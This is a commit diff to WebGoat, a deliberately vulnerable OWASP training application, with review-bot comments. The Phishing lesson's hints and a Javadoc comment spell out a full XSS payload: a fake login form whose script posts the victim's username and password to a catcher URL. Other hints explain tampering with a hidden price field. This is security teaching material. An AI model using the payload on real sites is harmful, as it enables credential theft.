Added client-side validation to HiddenFieldTampering.java, added a new ECS makeButton with an onClick function, corrected authorship in several files

git-svn-id: http://webgoat.googlecode.com/svn/trunk@220 4033779f-a91e-0410-96ef-6bf7bf53c507
mayhew64 2008-01-09 13:28:07 +00:00
parent 3645564018
commit 84ca966ce5
9 changed files with 1354 additions and 1336 deletions


@ -46,7 +46,7 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
* site</a> (this lesson is heavily based on Jeff Williams' SQL * site</a> (this lesson is heavily based on Bruce Mayhews' SQL
* Injection lesson * Injection lesson
* @created January 14, 2005 * @created January 14, 2005
*/ */


@ -53,7 +53,7 @@ import org.owasp.webgoat.session.ParameterNotFoundException;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class DOS_Login extends LessonAdapter public class DOS_Login extends LessonAdapter


@ -2,9 +2,11 @@ package org.owasp.webgoat.lessons;
import java.util.ArrayList; import java.util.ArrayList;
import java.util.List; import java.util.List;
import java.util.regex.Pattern;
import org.apache.ecs.Element; import org.apache.ecs.Element;
import org.apache.ecs.ElementContainer; import org.apache.ecs.ElementContainer;
import org.apache.ecs.StringElement;
import org.apache.ecs.html.A; import org.apache.ecs.html.A;
import org.apache.ecs.html.B; import org.apache.ecs.html.B;
import org.apache.ecs.html.BR; import org.apache.ecs.html.BR;
@ -50,11 +52,16 @@ import org.owasp.webgoat.session.WebSession;
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a>
* @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class HiddenFieldTampering extends LessonAdapter public class HiddenFieldTampering extends LessonAdapter
{ {
public final static A ASPECT_LOGO = new A().setHref("http://www.aspectsecurity.com").addElement(new IMG("images/logos/aspect.jpg").setAlt("Aspect Security").setBorder(0).setHspace(0).setVspace(0)); public final static A ASPECT_LOGO =
new A().setHref("http://www.aspectsecurity.com").addElement(
new IMG("images/logos/aspect.jpg")
.setAlt("Aspect Security").setBorder(0)
.setHspace(0).setVspace(0));
private final static String PRICE = "Price"; private final static String PRICE = "Price";
@ -62,37 +69,56 @@ public class HiddenFieldTampering extends LessonAdapter
private final static String PRICE_TV_HACKED = "9.99"; private final static String PRICE_TV_HACKED = "9.99";
String regex = "^" + PRICE_TV + "$"; // obviously the "." will match any char - any interesting exploit!
Pattern pattern1 = Pattern.compile(regex);
String lineSep = System.getProperty("line.separator");
String script =
"<SCRIPT>" + lineSep + "regex=/" + regex + "/;" + "function validate() { " + lineSep
+ "if (!regex.test(document.form." + PRICE + ".value)) {alert('Data tampering is disallowed'); "
+" document.form." + PRICE + ".value = " + PRICE_TV + ";}"
+ lineSep + "else document.form.submit();" + lineSep + "} " + lineSep + "</SCRIPT>" + lineSep;
/** /**
* Constructor for the HiddenFieldScreen object * Constructor for the HiddenFieldScreen object
*/ */
public HiddenFieldTampering() public HiddenFieldTampering()
{} {
}
/** /**
* Description of the Method * Description of the Method
* *
* @param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
protected Element createContent(WebSession s) protected Element createContent(WebSession s)
{ {
ElementContainer ec = new ElementContainer(); ElementContainer ec = new ElementContainer();
ec.addElement(new StringElement(script));
float quantity;
float total;
String price = PRICE_TV;
try try
{ {
String price = s.getParser().getRawParameter(PRICE, PRICE_TV); price = s.getParser().getRawParameter(PRICE, PRICE_TV);
float quantity = s.getParser().getFloatParameter("QTY", 1.0f); quantity = s.getParser().getFloatParameter("QTY", 1.0f);
float total = quantity * Float.parseFloat(price); total = quantity * Float.parseFloat(price);
}
catch (Exception e)
{
s.setMessage("Invaild data " + this.getClass().getName());
price = PRICE_TV;
quantity = 1.0f;
total = quantity * Float.parseFloat(PRICE_TV);
}
if (price.equals(PRICE_TV)) if (price.equals(PRICE_TV))
{ {
ec.addElement(new Center().addElement(new H1() ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart ")));
.addElement("Shopping Cart ")));
ec.addElement(new BR()); ec.addElement(new BR());
Table t = new Table().setCellSpacing(0).setCellPadding(2) Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%").setAlign("center");
.setBorder(1).setWidth("90%").setAlign("center");
if (s.isColor()) if (s.isColor())
{ {
@ -100,26 +126,22 @@ public class HiddenFieldTampering extends LessonAdapter
} }
TR tr = new TR(); TR tr = new TR();
tr.addElement(new TH().addElement( tr.addElement(new TH().addElement("Shopping Cart Items -- To Buy Now").setWidth("80%"));
"Shopping Cart Items -- To Buy Now").setWidth("80%"));
tr.addElement(new TH().addElement("Price:").setWidth("10%")); tr.addElement(new TH().addElement("Price:").setWidth("10%"));
tr.addElement(new TH().addElement("Quantity:").setWidth("3%")); tr.addElement(new TH().addElement("Quantity:").setWidth("3%"));
tr.addElement(new TH().addElement("Total").setWidth("7%")); tr.addElement(new TH().addElement("Total").setWidth("7%"));
t.addElement(tr); t.addElement(tr);
tr = new TR(); tr = new TR();
tr.addElement(new TD() tr.addElement(new TD().addElement("56 inch HDTV (model KTV-551)"));
.addElement("56 inch HDTV (model KTV-551)"));
tr.addElement(new TD().addElement(PRICE_TV).setAlign("right")); tr.addElement(new TD().addElement(PRICE_TV).setAlign("right"));
tr.addElement(new TD().addElement( tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
new Input(Input.TEXT, "QTY", 1)).setAlign("right"));
tr.addElement(new TD().addElement("$" + total)); tr.addElement(new TD().addElement("$" + total));
t.addElement(tr); t.addElement(tr);
ec.addElement(t); ec.addElement(t);
t = new Table().setCellSpacing(0).setCellPadding(2) t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
.setBorder(0).setWidth("90%").setAlign("center");
if (s.isColor()) if (s.isColor())
{ {
@ -128,13 +150,10 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(new BR()); ec.addElement(new BR());
tr = new TR(); tr = new TR();
tr.addElement(new TD() tr.addElement(new TD().addElement("The total charged to your credit card:"));
.addElement("The total charged to your credit card:"));
tr.addElement(new TD().addElement("$" + total)); tr.addElement(new TD().addElement("$" + total));
tr.addElement(new TD().addElement(ECSFactory tr.addElement(new TD().addElement(ECSFactory.makeButton("Update Cart")));
.makeButton("Update Cart"))); tr.addElement(new TD().addElement(ECSFactory.makeButton("Purchase", "validate()")));
tr.addElement(new TD().addElement(ECSFactory
.makeButton("Purchase")));
t.addElement(tr); t.addElement(tr);
ec.addElement(t); ec.addElement(t);
@ -143,8 +162,7 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(input); ec.addElement(input);
ec.addElement(new BR()); ec.addElement(new BR());
} } else
else
{ {
if (!price.toString().equals(PRICE_TV)) if (!price.toString().equals(PRICE_TV))
{ {
@ -154,21 +172,12 @@ public class HiddenFieldTampering extends LessonAdapter
ec.addElement(new P().addElement("Your total price is:")); ec.addElement(new P().addElement("Your total price is:"));
ec.addElement(new B("$" + total)); ec.addElement(new B("$" + total));
ec.addElement(new BR()); ec.addElement(new BR());
ec ec.addElement(new P().addElement("This amount will be charged to your credit card immediately."));
.addElement(new P()
.addElement("This amount will be charged to your credit card immediately."));
}
}
catch (Exception e)
{
s.setMessage("Error generating " + this.getClass().getName());
e.printStackTrace();
} }
return (ec); return (ec);
} }
/** /**
* DOCUMENT ME! * DOCUMENT ME!
* *
@ -179,7 +188,6 @@ public class HiddenFieldTampering extends LessonAdapter
return Category.UNVALIDATED_PARAMETERS; return Category.UNVALIDATED_PARAMETERS;
} }
/** /**
* Gets the hints attribute of the HiddenFieldScreen object * Gets the hints attribute of the HiddenFieldScreen object
* *
@ -188,10 +196,8 @@ public class HiddenFieldTampering extends LessonAdapter
protected List<String> getHints(WebSession s) protected List<String> getHints(WebSession s)
{ {
List<String> hints = new ArrayList<String>(); List<String> hints = new ArrayList<String>();
hints hints.add("This application is using hidden fields to transmit price information to the server.");
.add("This application is using hidden fields to transmit price information to the server."); hints.add("Use a program to intercept and change the value in the hidden field.");
hints
.add("Use a program to intercept and change the value in the hidden field.");
hints hints
.add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from " .add("Use <A href=\"http://www.owasp.org/development/webscarab\">WebScarab</A> to change the price of the TV from "
+ PRICE_TV + " to " + PRICE_TV_HACKED + "."); + PRICE_TV + " to " + PRICE_TV_HACKED + ".");
@ -199,7 +205,6 @@ public class HiddenFieldTampering extends LessonAdapter
return hints; return hints;
} }
/** /**
* Gets the instructions attribute of the HiddenFieldTampering object * Gets the instructions attribute of the HiddenFieldTampering object
* *
@ -207,20 +212,19 @@ public class HiddenFieldTampering extends LessonAdapter
*/ */
public String getInstructions(WebSession s) public String getInstructions(WebSession s)
{ {
String instructions = "Try to purchase the HDTV for less than the purchase price, if you have not done so already."; String instructions =
"Try to purchase the HDTV for less than the purchase price, if you have not done so already.";
return (instructions); return (instructions);
} }
private final static Integer DEFAULT_RANKING = new Integer(50); private final static Integer DEFAULT_RANKING = new Integer(50);
protected Integer getDefaultRanking() protected Integer getDefaultRanking()
{ {
return DEFAULT_RANKING; return DEFAULT_RANKING;
} }
/** /**
* Gets the title attribute of the HiddenFieldScreen object * Gets the title attribute of the HiddenFieldScreen object
* *
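Review bot: `Pattern pattern1 = Pattern.compile(regex);` in the hunk at `@ -62,37 +69,56` is compiled from the new `regex` field but is never referenced in any visible hunk, so the new `java.util.regex.Pattern` import only serves dead code and the server still computes `total` from the raw `Price` parameter without comparing it to PRICE_TV; either drop the field or use it in createContent before `total` is computed (leaving the hidden field trusted server-side appears to be the lesson's intent, so the former is probably right). The comment on the same line already notes that an unescaped `.` in PRICE_TV matches any character; if the client check is meant to be exact rather than deliberately loose, build the Java pattern with `Pattern.quote(PRICE_TV)` and escape the dot in the JavaScript regex as well. The new catch block's user-facing message misspells "Invalid" (`s.setMessage("Invaild data " + this.getClass().getName());`). createContent's body continues across the following hunks.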


@ -39,7 +39,7 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class HttpBasics extends LessonAdapter public class HttpBasics extends LessonAdapter


@ -61,28 +61,28 @@ public class Phishing extends LessonAdapter
protected final static String SEARCH = "Username"; protected final static String SEARCH = "Username";
private String searchText; private String searchText;
/** /**
* Description of the Method * Description of the Method
* *
* @param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
private boolean postedCredentials(WebSession s) private boolean postedCredentials(WebSession s)
{ {
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties() String postedToCookieCatcher =
.getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING); getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
// <START_OMIT_SOURCE> // <START_OMIT_SOURCE>
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING)); return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
// <END_OMIT_SOURCE> // <END_OMIT_SOURCE>
} }
/** /**
* Description of the Method * Description of the Method
* *
* @param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
protected Element createContent(WebSession s) protected Element createContent(WebSession s)
@ -109,14 +109,12 @@ public class Phishing extends LessonAdapter
return (ec); return (ec);
} }
protected Element makeSearch(WebSession s) protected Element makeSearch(WebSession s)
{ {
ElementContainer ec = new ElementContainer(); ElementContainer ec = new ElementContainer();
ec.addElement(new H1().addElement("WebGoat Search ")); ec.addElement(new H1().addElement("WebGoat Search "));
Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0) Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setAlign("center");
.setAlign("center");
TR tr = new TR(); TR tr = new TR();
tr.addElement(new TD().addElement("&nbsp;").setColSpan(2)); tr.addElement(new TD().addElement("&nbsp;").setColSpan(2));
@ -127,11 +125,8 @@ public class Phishing extends LessonAdapter
} }
tr = new TR(); tr = new TR();
tr tr.addElement(new TH().addElement("This facility will search the WebGoat source.").setColSpan(2)
.addElement(new TH() .setAlign("center"));
.addElement(
"This facility will search the WebGoat source.")
.setColSpan(2).setAlign("center"));
t.addElement(tr); t.addElement(tr);
tr = new TR(); tr = new TR();
@ -165,7 +160,6 @@ public class Phishing extends LessonAdapter
return (ec); return (ec);
} }
/** /**
* Gets the hints attribute of the CluesScreen object * Gets the hints attribute of the CluesScreen object
* *
@ -174,63 +168,87 @@ public class Phishing extends LessonAdapter
protected List<String> getHints(WebSession s) protected List<String> getHints(WebSession s)
{ {
List<String> hints = new ArrayList<String>(); List<String> hints = new ArrayList<String>();
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
+ "Try to make the form look official.");
hints hints
.add("Try adding HTML to the search field to create a fake authentication form.<BR>" + .add("Try: <BR> "
"Try to make the form look official."); + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
hints.add("Try: <BR> " + + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + hints
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); .add("Add functionality that can post a request, a button might work<BR><BR>"
hints.add("Add functionality that can post a request, a button might work<BR><BR>" + + "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
"After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>" + + "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
"http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE"); hints
hints.add("Try: <BR> " + .add("Try: <BR> "
"&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
"value=&quot;login&quot;&gt;"+ + "value=&quot;login&quot;&gt;"
"<BR><BR>Solution for this hint:<BR><BR>" + + "<BR><BR>Solution for this hint:<BR><BR>"
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
hints.add("Make the button perform an action on submit, <BR>" + hints
"adding an onclick=\"hack()\" might work<BR>"+ .add("Make the button perform an action on submit, <BR>"
"Don't forget to add the hack() javascript function" + + "adding an onclick=\"hack()\" might work<BR>"
"<BR><BR>Solution for this hint:<BR><BR>" + + "Don't forget to add the hack() javascript function"
"password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "<BR><BR>Solution for this hint:<BR><BR>"
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "password&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); + "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
hints.add("You need to create the hack() function. This function will pull the credentials from the " + + "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
"webpage and post them to the WebGoat catcher servlet. <BR>" + hints
"<BR> Some useful code snippets:<UL>" + .add("You need to create the hack() function. This function will pull the credentials from the "
"<LI>doucument.forms[0].user.value - will access the user field" + + "webpage and post them to the WebGoat catcher servlet. <BR>"
"<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post" + + "<BR> Some useful code snippets:<UL>"
"<LI>javascript string concatentation uses a \"+\" </UL>" + + "<LI>doucument.forms[0].user.value - will access the user field"
"<BR><BR>Solution for this hint():<BR><BR>" + + "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." + + "<LI>javascript string concatentation uses a \"+\" </UL>"
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " + + "<BR><BR>Solution for this hint():<BR><BR>"
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" + + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" + + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
"&lt;/script&gt;"); + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
hints.add("Complete solution for this lesson:<BR><BR>" + + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
"password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen." + + "&lt;/script&gt;");
"\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); " + hints
"XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+" + .add("Complete solution for this lesson:<BR><BR>"
"document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}" + + "password&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
"&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2" + + "\nUser Name = &quot; + document.forms(0).user.value + &quot;\nPassword = &quot; + document.forms(0).pass.value); "
"&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; " + + "XSSImage=new Image; XSSImage.src=&quot;http://localhost./WebGoat/catcher?PROPERTY=yes&amp;user=&quot;+"
"name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; " + + "document.forms(0).user.value + &quot;&amp;password=&quot; + document.forms(0).pass.value + &quot;&quot;;}"
"name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; " + + "&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H2"
"value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;"); + "&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; "
+ "name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; "
+ "name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; "
+ "value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;");
/** /**
* password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}</script><form><br><br><HR><H3>This feature requires account login:</H2><br><br>Enter Username:<br><input type="text" id="user" name="user"><br>Enter Password:<br><input type="password" name = "pass"><br><input type="submit" name="login" value="login" onclick="hack()"></form><br><br><HR> <!-- * password<script>function hack(){ alert("Had this been a real
* attack... Your credentials were just stolen.\nUser Name = " +
* document.forms(0).user.value + "\nPassword = " +
* document.forms(0).pass.value); XSSImage=new Image;
* XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
* "&password=" + document.forms(0).pass.value + "";}</script><form><br>
* <br>
* <HR>
* <H3>This feature requires account login:</H2>
* <br>
* <br>
* Enter Username:<br>
* <input type="text" id="user" name="user"><br>
* Enter Password:<br>
* <input type="password" name = "pass"><br>
* <input type="submit" name="login" value="login" onclick="hack()"></form><br>
* <br>
* <HR>
* <!--
* *
*/ */
return hints; return hints;
} }
/** /**
* Gets the instructions attribute of the XssSearch object * Gets the instructions attribute of the XssSearch object
* *
@ -238,26 +256,25 @@ public class Phishing extends LessonAdapter
*/ */
public String getInstructions(WebSession s) public String getInstructions(WebSession s)
{ {
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>" + String instructions =
"Below is an example of a standard search feature.<br>" + "This lesson is an example of how a website might support a phishing attack<BR><BR>"
"Using XSS and HTML insertion, your goal is to: <UL>" + + "Below is an example of a standard search feature.<br>"
"<LI>Insert html to that requests credentials" + + "Using XSS and HTML insertion, your goal is to: <UL>"
"<LI>Add javascript to actually collect the credentials" + + "<LI>Insert html to that requests credentials"
"<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> " + + "<LI>Add javascript to actually collect the credentials"
"To pass this lesson, the credentials must be posted to the catcher servlet.<BR>"; + "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
return (instructions); return (instructions);
} }
private final static Integer DEFAULT_RANKING = new Integer(30); private final static Integer DEFAULT_RANKING = new Integer(30);
protected Integer getDefaultRanking() protected Integer getDefaultRanking()
{ {
return DEFAULT_RANKING; return DEFAULT_RANKING;
} }
/** /**
* Gets the category attribute of the FailOpenAuthentication object * Gets the category attribute of the FailOpenAuthentication object
* *
@ -268,7 +285,6 @@ public class Phishing extends LessonAdapter
return Category.XSS; return Category.XSS;
} }
/** /**
* Gets the title attribute of the CluesScreen object * Gets the title attribute of the CluesScreen object
* *


@ -41,7 +41,7 @@ import org.owasp.webgoat.session.WebSession;
* *
* For details, please see http://code.google.com/p/webgoat/ * For details, please see http://code.google.com/p/webgoat/
* *
* @author Jeff Williams <a href="http://www.aspectsecurity.com">Aspect Security</a> * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
* @created October 28, 2003 * @created October 28, 2003
*/ */
public class UserAdminScreen extends LessonAdapter public class UserAdminScreen extends LessonAdapter


@ -419,8 +419,8 @@ public class Course
} }
if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName)) if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName))
{ {
System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName()); //System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName());
System.out.println("fileName: " + fileName + " == className: " + className ); //System.out.println("fileName: " + fileName + " == className: " + className );
lesson.setLessonSolutionFileName(absoluteFile); lesson.setLessonSolutionFileName(absoluteFile);
} }
} }
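Review bot: The two debug statements in Course are commented out rather than removed, which leaves two dead `//System.out.println(...)` lines at the top of the `if` body with no indication of whether they are meant to come back. Delete them, or, if the project has a logging facility (none is visible in this hunk), emit them at debug level so they can be enabled without editing code. The enclosing method starts and ends outside the hunk.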


@ -116,6 +116,15 @@ public class ECSFactory
return (b); return (b);
} }
public static Element makeButton(String text, String onClickFunction)
{
Input b = (Input)makeButton(text);
b.setOnClick(onClickFunction);
return (b);
}
/** /**
* Description of the Method * Description of the Method
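Review bot: The new `makeButton(String text, String onClickFunction)` has no Javadoc, unlike the neighbouring ECSFactory methods, and nothing states that `onClickFunction` is written verbatim into the button's onclick attribute; add a Javadoc along the lines of `@param onClickFunction JavaScript expression emitted verbatim into the onclick attribute; pass a fixed literal such as "validate()", never request-derived text`, since the only visible caller passes a literal and a caller forwarding parameter input here would be emitting script into the page unescaped. The cast `Input b = (Input)makeButton(text);` assumes the one-argument overload always produces an Input; if that overload is declared to return Element, a later change to it would surface here as a ClassCastException at runtime, so consider declaring the one-argument overload's return type as Input or guarding the cast. The one-argument makeButton's body starts outside the hunk.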


@ -43,27 +43,30 @@ import org.owasp.webgoat.util.HtmlEncoder;
public class ParameterParser public class ParameterParser
{ {
private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't allow #& specifically private final static String ALLOWED_CHARACTERS = "$()-?.@!,:;=//+"; // Don't
// allow
// #&
// specifically
private ServletRequest request; private ServletRequest request;
/** /**
* Constructs a new ParameterParser to handle the parameters of the given * Constructs a new ParameterParser to handle the parameters of the given
* request. * request.
* *
*@param request the servlet request * @param request
* the servlet request
*/ */
public ParameterParser(ServletRequest request) public ParameterParser(ServletRequest request)
{ {
this.request = request; this.request = request;
} }
/** /**
* Description of the Method * Description of the Method
* *
*@param s Description of the Parameter * @param s
* Description of the Parameter
* @return Description of the Return Value * @return Description of the Return Value
*/ */
private String clean(String s) private String clean(String s)
@ -74,12 +77,10 @@ public class ParameterParser
{ {
char c = s.charAt(loop); char c = s.charAt(loop);
if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) if (Character.isLetterOrDigit(c) || Character.isWhitespace(c) || (ALLOWED_CHARACTERS.indexOf(c) != -1))
|| (ALLOWED_CHARACTERS.indexOf(c) != -1))
{ {
clean.append(c); clean.append(c);
} } else
else
{ {
clean.append('.'); clean.append('.');
} }
@ -88,27 +89,28 @@ public class ParameterParser
return (clean.toString()); return (clean.toString());
} }
/** /**
* Gets the named parameter value as a boolean * Gets the named parameter value as a boolean
* *
*@param name the parameter name * @param name
* the parameter name
* @return the parameter value as a boolean * @return the parameter value as a boolean
*@exception ParameterNotFoundException if the parameter was not found * @exception ParameterNotFoundException
* if the parameter was not found
*/ */
public boolean getBooleanParameter(String name) public boolean getBooleanParameter(String name) throws ParameterNotFoundException
throws ParameterNotFoundException
{ {
return new Boolean(getStringParameter(name)).booleanValue(); return new Boolean(getStringParameter(name)).booleanValue();
} }
/** /**
* Gets the named parameter value as a boolean, with a default. Returns the * Gets the named parameter value as a boolean, with a default. Returns the
* default value if the parameter is not found. * default value if the parameter is not found.
* *
*@param name the parameter name * @param name
*@param def the default parameter value * the parameter name
* @param def
* the default parameter value
* @return the parameter value as a boolean, or the default * @return the parameter value as a boolean, or the default
*/ */
public boolean getBooleanParameter(String name, boolean def) public boolean getBooleanParameter(String name, boolean def)
@ -123,13 +125,15 @@ public class ParameterParser
} }
} }
